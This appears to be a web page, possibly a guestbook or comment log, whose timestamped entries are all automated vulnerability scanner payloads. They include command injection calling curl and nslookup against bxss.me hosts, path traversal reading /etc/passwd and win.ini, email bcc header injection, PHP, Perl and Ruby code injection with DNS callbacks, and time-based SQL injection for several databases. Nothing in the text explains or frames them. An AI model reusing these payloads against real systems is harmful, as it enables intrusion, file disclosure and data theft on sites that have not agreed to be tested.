&(nslookup -q=cname hitvelhdslbla3d669.bxss.me||curl hitvelhdslbla3d669.bxss.me)&'\"`0&(nslookup -q=cname hitvelhdslbla3d669.bxss.me||curl hitvelhdslbla3d669.bxss.me)&`'
tGhYxqFm2023-10-19 14:39:18
|(nslookup -q=cname hitrcwufqfvotfa5cc.bxss.me||curl hitrcwufqfvotfa5cc.bxss.me)
tGhYxqFm2023-10-19 14:39:19
`(nslookup -q=cname hitzzkgvnbsofa7647.bxss.me||curl hitzzkgvnbsofa7647.bxss.me)`
tGhYxqFm2023-10-19 14:39:26
../../../../../../../../../../../../../../etc/passwd
tGhYxqFm2023-10-19 14:39:27
../../../../../../../../../../../../../../windows/win.ini
tGhYxqFm2023-10-19 14:39:29
file:///etc/passwd
tGhYxqFm2023-10-19 14:39:31
../
tGhYxqFm2023-10-19 14:39:34
bcc:009247.160276-35196.160276.25f0c.19649.2@bxss.me
tGhYxqFm2023-10-19 14:39:35
to@example.com> bcc:009247.160276-35197.160276.25f0c.19649.2@bxss.me
tGhYxqFm2023-10-19 14:39:38
12345'"\'\");|]*{ <>�''
tGhYxqFm2023-10-19 14:39:43
${9999295+10000400}
tGhYxqFm2023-10-19 14:39:50
http://dicrpdbjmemujemfyopp.zzz/yrphmgdpgulaszriylqiipemefmacafkxycjaxjs?.jpg
tGhYxqFm2023-10-19 14:39:54
!(()&&!|*|*|
tGhYxqFm2023-10-19 14:39:54
1yrphmgdpgulaszriylqiipemefmacafkxycjaxjs.jpg
tGhYxqFm2023-10-19 14:39:56
Http://bxss.me/t/fit.txt
tGhYxqFm2023-10-19 14:39:57
^(#$!@#$)(()))******
tGhYxqFm2023-10-19 14:40:00
http://bxss.me/t/fit.txt?.jpg
tGhYxqFm2023-10-19 14:40:04
/etc/shells
tGhYxqFm2023-10-19 14:40:07
'"()
tGhYxqFm2023-10-19 14:40:07
c:/windows/win.ini
tGhYxqFm2023-10-19 14:40:10
bxss.me
tGhYxqFm2023-10-19 14:40:10
'&&sleep(27*1000)*uugdjo&&'
tGhYxqFm2023-10-19 14:40:13
"&&sleep(27*1000)*rparaa&&"
tGhYxqFm2023-10-19 14:40:14
'.gethostbyname(lc('hitsb'.'nltvomsdd1819.bxss.me.')).'A'.chr(67).chr(hex('58')).chr(107).chr(66).chr(119).chr(83).'
tGhYxqFm2023-10-19 14:40:16
'||sleep(27*1000)*kxiybb||'
tGhYxqFm2023-10-19 14:40:17
".gethostbyname(lc("hithq"."wuuqqgdk4d699.bxss.me."))."A".chr(67).chr(hex("58")).chr(114).chr(68).chr(97).chr(74)."
tGhYxqFm2023-10-19 14:40:20
"||sleep(27*1000)*hbcvgj||"
tGhYxqFm2023-10-19 14:40:22
;assert(base64_decode('cHJpbnQobWQ1KDMxMzM3KSk7'));
tGhYxqFm2023-10-19 14:40:23
ctime sleep p0 (I30 tp1 Rp2 .
tGhYxqFm2023-10-19 14:40:26
';print(md5(31337));$a='
tGhYxqFm2023-10-19 14:40:27
HttP://bxss.me/t/xss.html?%00
tGhYxqFm2023-10-19 14:40:29
";print(md5(31337));$a="
tGhYxqFm2023-10-19 14:40:30
bxss.me/t/xss.html?%00
tGhYxqFm2023-10-19 14:40:32
${@print(md5(31337))}
tGhYxqFm2023-10-19 14:40:34
"+"A".concat(70-3).concat(22*4).concat(120).concat(65).concat(118).concat(85)+(require"socket" Socket.gethostbyname("hitug"+"eqoezjthfb5cf.bxss.me.")[3].to_s)+"
tGhYxqFm2023-10-19 14:40:36
${@print(md5(31337))}\
tGhYxqFm2023-10-19 14:40:38
'+'A'.concat(70-3).concat(22*4).concat(120).concat(83).concat(110).concat(75)+(require'socket' Socket.gethostbyname('hitxw'+'wmkruwhle1bc2.bxss.me.')[3].to_s)+'
tGhYxqFm2023-10-19 14:40:39
'.print(md5(31337)).'
tGhYxqFm2023-10-19 14:40:42
281
tGhYxqFm2023-10-19 14:40:46
281
tGhYxqFm2023-10-19 14:40:49
281/.
tGhYxqFm2023-10-19 14:59:58
IgPlwhcJ
tGhYxqFm2023-10-19 15:00:13
-1 OR 2+307-307-1=0+0+0+1
tGhYxqFm2023-10-19 15:00:17
-1 OR 3+307-307-1=0+0+0+1
tGhYxqFm2023-10-19 15:00:21
-1 OR 3*2<(0+5+307-307)
tGhYxqFm2023-10-19 15:00:28
-1 OR 3*2>(0+5+307-307)
tGhYxqFm2023-10-19 15:01:35
if(now()=sysdate(),sleep(15),0)
tGhYxqFm2023-10-19 15:02:46
0'XOR(if(now()=sysdate(),sleep(15),0))XOR'Z
tGhYxqFm2023-10-19 15:04:17
0"XOR(if(now()=sysdate(),sleep(15),0))XOR"Z
tGhYxqFm2023-10-19 15:04:37
(select(0)from(select(sleep(15)))v)/*'+(select(0)from(select(sleep(15)))v)+'"+(select(0)from(select(sleep(15)))v)+"*/
tGhYxqFm2023-10-19 15:04:59
-1; waitfor delay '0:0:15' --
tGhYxqFm2023-10-19 15:05:17
-1); waitfor delay '0:0:15' --
tGhYxqFm2023-10-19 15:05:37
-1)); waitfor delay '0:0:15' --
tGhYxqFm2023-10-19 15:05:59
1 waitfor delay '0:0:15' --
tGhYxqFm2023-10-19 15:06:17
4boc168r'; waitfor delay '0:0:15' --
tGhYxqFm2023-10-19 15:06:41
qyi2ixYT'); waitfor delay '0:0:15' --
tGhYxqFm2023-10-19 15:07:03
njzQYdBZ')); waitfor delay '0:0:15' --
tGhYxqFm2023-10-19 15:07:28
-5 OR 834=(SELECT 834 FROM PG_SLEEP(15))--
tGhYxqFm2023-10-19 15:07:53
-5) OR 611=(SELECT 611 FROM PG_SLEEP(15))--
tGhYxqFm2023-10-19 15:08:21
-1)) OR 351=(SELECT 351 FROM PG_SLEEP(15))--
tGhYxqFm2023-10-19 15:08:53
wTlWvXNE' OR 510=(SELECT 510 FROM PG_SLEEP(15))--
tGhYxqFm2023-10-19 15:09:20
EUcUHgoM') OR 413=(SELECT 413 FROM PG_SLEEP(15))--
tGhYxqFm2023-10-19 15:09:50
ojY6irGi')) OR 74=(SELECT 74 FROM PG_SLEEP(15))--
tGhYxqFm2023-10-19 15:10:28
*DBMS_PIPE.RECEIVE_MESSAGE(CHR(99)||CHR(99)||CHR(99),15)
tGhYxqFm2023-10-19 15:11:05
'||DBMS_PIPE.RECEIVE_MESSAGE(CHR(98)||CHR(98)||CHR(98),15)||'
tGhYxqFm2023-10-19 15:11:07
1'"
tGhYxqFm2023-10-19 15:11:10
1����%2527%2522
tGhYxqFm2023-10-19 15:11:12
@@eJEDQ
Remark: